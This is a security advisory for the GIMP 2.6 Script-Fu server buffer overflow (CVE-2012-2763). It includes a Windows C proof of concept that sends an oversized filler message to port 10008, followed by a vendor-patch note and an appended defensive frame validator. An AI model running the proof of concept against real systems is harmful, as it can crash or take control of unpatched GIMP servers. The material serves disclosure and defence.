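Published: 2012-05-31
Updated: 2012-06-01

Affected systems:
GIMP GIMP 2.6.x
Unaffected systems:
GIMP GIMP 2.8.0
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53741
CVE(CAN) ID: CVE-2012-2763

GIMP (GNU Image Manipulation Program) is a cross-platform image editing program.

Versions of GIMP before 2.6.12 have a buffer overflow in the implementation of the script-fu server component, affecting both the script-fu console and the script-fu network server. Successful exploitation lets an attacker overflow a buffer in the script-fu server with a specially crafted message, overwriting several function pointers, which gives the attacker control of EIP and allows arbitrary code execution in the affected application.

<*Source: Joseph Sheridan
Link: http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html
http://www.linuxidc.com/Linux/2012-06/61836.htm
*>

Test method: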
--------------------------------------------------------------------------------
Warning

The following program (method) may be offensive in nature and is intended for security research and teaching only. Use at your own risk!

Joseph Sheridan provided the following test method:

////////////////////////////////////////////////////////////////
//                                                            //
// PoC for GIMP <= 2.6 Script-Fu server buffer overflow       //
// Author: Joseph Sheridan                                    //
// Date: 20/05/2012                                           //
//                                                            //
// compile with cl scriptfubof.c /link wsock32.lib            //
////////////////////////////////////////////////////////////////

#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define DEFAULT_PORT 10008
// TCP socket type
#define DEFAULT_PROTO SOCK_STREAM

void senddata();
void recvdata();

WSADATA wsaData;
SOCKET conn_socket;
char Buffer[2000000];
char inBuffer[128];

void Usage()
{
    printf("Usage: scriptfubof servername portnumber\n");
    fflush(stdout);
    exit(1);
}

int main(int argc, char *argv[])
{
    // default to localhost
    char *server_name= "localhost";
    unsigned short port = DEFAULT_PORT;
    int i, loopcount, maxloop=-1;
    int retval;
    unsigned int addr;
    int socket_type = DEFAULT_PROTO;
    struct sockaddr_in server;

    if (argc < 3) {
        Usage();
    }
    if ((retval = WSAStartup(0x202, &wsaData)) != 0)
    {
        fprintf(stderr,"WSAStartup() failed with error %d\n", retval);
        WSACleanup();
        return -1;
    }
    // Get portnum
    port = atoi(argv[2]);
    memset(&server, 0, sizeof(server));
    server.sin_addr.s_addr = inet_addr(argv[1]);
    server.sin_family = AF_INET;
    server.sin_port = htons(port);

    conn_socket = socket(AF_INET, socket_type, 0); /* Open a socket */
    // SOCKET is unsigned on Windows, so compare against INVALID_SOCKET
    if (conn_socket == INVALID_SOCKET)
    {
        fprintf(stderr,"Client: Error Opening socket: Error %d\n", WSAGetLastError());
        WSACleanup();
        return -1;
    }
    if (connect(conn_socket, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR)
    {
        fprintf(stderr,"Client: connect() failed: %d\n", WSAGetLastError());
        WSACleanup();
        return -1;
    }

    // Send the data
    senddata();

    // receive a msg
    recvdata();
    closesocket(conn_socket);
    WSACleanup();
    return 0;
}

void senddata() {
    int loopcount = 0, retval = 0;
unsigned char command[]="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
    Buffer[0] = '\x47';                 // Magic byte "G"
    Buffer[1] = sizeof(command) / 256;  // High byte of L - L div 256
    Buffer[2] = sizeof(command) % 256;  // Low byte of L - L mod 256
    strcpy(&Buffer[3], (const char *)command);
    retval = send(conn_socket, Buffer, sizeof(command) + 3, 0);
    if (retval == SOCKET_ERROR)
    {
        fprintf(stderr,"Client: send() failed: error %d.\n", WSAGetLastError());
        WSACleanup();
        return;
    }
    else
        printf("Client: send() is OK.\n");
    printf("Client: Sent data \"%s\"\n", Buffer);
}

void recvdata() {
    int i=0;
    int retval=0;
    memset(inBuffer,0,128);
    retval = recv(conn_socket, inBuffer, 128, 0);
    printf("retval is :%d\n", retval);
    printf("first char is: %x\n", inBuffer[0]);
    if (retval == SOCKET_ERROR)
    {
        fprintf(stderr,"Client: recv() failed: error %d.\n", WSAGetLastError());
        closesocket(conn_socket);
        WSACleanup();
        return;
    }
    else {
        printf("Client: recv() is OK.\n");
        // print the message contents...
        for (i=0;i<retval;i++) {
            printf("%c", inBuffer[i]);
        }
        printf("\n");
        fflush(stdout);
    }
}

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

GIMP
----
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:

http://www.gimp.org/
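An added example, not part of the original advisory and not GIMP's own code: a C validator for the request framing that the PoC above uses (magic byte 'G', two length bytes, then the command text), which rejects oversized or inconsistent frames before anything is copied. SFU_MAX_CMD and all function names are assumptions chosen for illustration, and the filler frames are constructed test input.

```c
#include <stdio.h>
#include <string.h>

#define SFU_MAGIC   0x47u   /* 'G', as in the PoC */
#define SFU_HDR_LEN 3u      /* magic + 2 length bytes */
#define SFU_MAX_CMD 1024u   /* assumed policy limit, not a GIMP constant */

enum sfu_status { SFU_OK, SFU_SHORT, SFU_BAD_MAGIC, SFU_TOO_LONG, SFU_MISMATCH };

/* Validate one frame; on SFU_OK copy the command into out (NUL-terminated).
 * Nothing is written to out unless every check has passed. */
enum sfu_status sfu_accept(const unsigned char *frame, size_t frame_len,
                           char *out, size_t out_cap)
{
    size_t declared;

    if (frame == NULL || frame_len < SFU_HDR_LEN)
        return SFU_SHORT;
    if (frame[0] != SFU_MAGIC)
        return SFU_BAD_MAGIC;
    declared = ((size_t)frame[1] << 8) | frame[2];   /* sender-controlled */
    if (declared > SFU_MAX_CMD || declared + 1 > out_cap)
        return SFU_TOO_LONG;
    if (frame_len - SFU_HDR_LEN != declared)         /* header vs. bytes seen */
        return SFU_MISMATCH;
    memcpy(out, frame + SFU_HDR_LEN, declared);
    out[declared] = '\0';
    return SFU_OK;
}

/* Constructed input: a frame with n filler bytes (n <= 65535), checked
 * against a destination sized for the policy limit. */
enum sfu_status sfu_check_filler(size_t n)
{
    static unsigned char frame[SFU_HDR_LEN + 65535u];
    char out[SFU_MAX_CMD + 1];

    if (n > 65535u)
        n = 65535u;
    frame[0] = SFU_MAGIC;
    frame[1] = (unsigned char)(n >> 8);
    frame[2] = (unsigned char)(n & 0xffu);
    memset(frame + SFU_HDR_LEN, 'a', n);
    return sfu_accept(frame, SFU_HDR_LEN + n, out, sizeof out);
}

int main(void)
{
    printf("16 bytes -> %d, 4000 bytes -> %d\n",
           sfu_check_filler(16), sfu_check_filler(4000));
    return 0;
}
```

The length check runs before the copy and is bounded by both the policy limit and the destination capacity, so a frame shaped like the PoC's is refused without touching the output buffer.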